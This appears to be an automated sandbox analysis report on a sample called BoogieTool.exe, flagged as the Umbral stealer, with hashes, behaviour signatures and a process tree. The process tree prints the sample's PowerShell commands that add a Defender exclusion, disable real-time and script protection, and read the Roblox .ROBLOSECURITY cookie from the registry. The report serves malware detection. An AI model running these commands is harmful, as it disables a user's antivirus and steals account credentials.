Analysis

  • max time kernel
    10s
  • max time network
    12s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-09-2024 18:02

General

  • Target

    BoogieTool.exe

  • Size

    229KB

  • MD5

    a95d6f4a4315650e730488eabbe1a5dc

  • SHA1

    dd8358dceb4125cbcc85c2d18721a2ef1aa5b165

  • SHA256

    3b97b49496b1d19bd7fec189d26ba0e5ff3051eb759e48cc02c934aceb7868ee

  • SHA512

    b3a1822d4426178ceae2ab76597bf072c41cfa374141bc7adfb01dfafcfc443a713d1526e800290afd265cd932ec756235ffde880cf5ab6fd858b2adf1ed619e

  • SSDEEP

    6144:tloZMYrIkd8g+EtXHkv/iD4yfqmR/k4XoG/BcoNNKb8e1mwMQi:voZHL+EP8yfqmR/k4XoG/BcoNAKJ

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BoogieTool.exe
    "C:\Users\Admin\AppData\Local\Temp\BoogieTool.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BoogieTool.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1284
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:368
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2908
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:944
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:3056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:216
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:3244

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      d28a889fd956d5cb3accfbaf1143eb6f

      SHA1

      157ba54b365341f8ff06707d996b3635da8446f7

      SHA256

      21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

      SHA512

      0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      17d8127be94d3c1b6fcc9a4ed585003e

      SHA1

      789874fcc7c778c723f3e89822d8cc8750c6c4c8

      SHA256

      ea357ad1f95863b3618d31e5b0f90495331f64de2b784d9e185b48668c937a7b

      SHA512

      bb18b6d07d82227f5cfbe3eb460df79ec892c560ad2964dcd4782aa26336ae15059843bf46a739bdd4a4daa58057f99102531a756a1cf434ce6449b3cd35a98e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      276798eeb29a49dc6e199768bc9c2e71

      SHA1

      5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

      SHA256

      cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

      SHA512

      0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      ec1ba4a995d866b282087b26a0539bbc

      SHA1

      c4aeae2bc3fa9a898680648b20102f01e8a811cf

      SHA256

      469da678c3c0364b1b511962cffd44cbfc10aab5c1c528c0c09fd952f08d8a2c

      SHA512

      07bf757ec9d0d368d3ef1bfc2b562895e2708757f8fefa04fa50beaa6fb38af1018ea0cfccf5666c5c8baa4c894deead9652c53e0608aa6a83ef5b396dba43e9

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mv4dxuot.p52.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1284-32-0x000001F06E280000-0x000001F06E49C000-memory.dmp

      Filesize

      2.1MB

    • memory/2772-36-0x00000290FE910000-0x00000290FE92E000-memory.dmp

      Filesize

      120KB

    • memory/2772-2-0x00007FF8FA260000-0x00007FF8FAD21000-memory.dmp

      Filesize

      10.8MB

    • memory/2772-91-0x00007FF8FA260000-0x00007FF8FAD21000-memory.dmp

      Filesize

      10.8MB

    • memory/2772-1-0x00000290FC240000-0x00000290FC280000-memory.dmp

      Filesize

      256KB

    • memory/2772-73-0x00000290FE950000-0x00000290FE962000-memory.dmp

      Filesize

      72KB

    • memory/2772-72-0x00000290FE900000-0x00000290FE90A000-memory.dmp

      Filesize

      40KB

    • memory/2772-34-0x00000290FE970000-0x00000290FE9E6000-memory.dmp

      Filesize

      472KB

    • memory/2772-35-0x00000290FE9F0000-0x00000290FEA40000-memory.dmp

      Filesize

      320KB

    • memory/2772-0-0x00007FF8FA263000-0x00007FF8FA265000-memory.dmp

      Filesize

      8KB

    • memory/5076-13-0x00007FF8FA260000-0x00007FF8FAD21000-memory.dmp

      Filesize

      10.8MB

    • memory/5076-18-0x00000299E0510000-0x00000299E067A000-memory.dmp

      Filesize

      1.4MB

    • memory/5076-12-0x00000299C7F90000-0x00000299C7FB2000-memory.dmp

      Filesize

      136KB

    • memory/5076-14-0x00007FF8FA260000-0x00007FF8FAD21000-memory.dmp

      Filesize

      10.8MB

    • memory/5076-15-0x00007FF8FA260000-0x00007FF8FAD21000-memory.dmp

      Filesize

      10.8MB

    • memory/5076-19-0x00007FF8FA260000-0x00007FF8FAD21000-memory.dmp

      Filesize

      10.8MB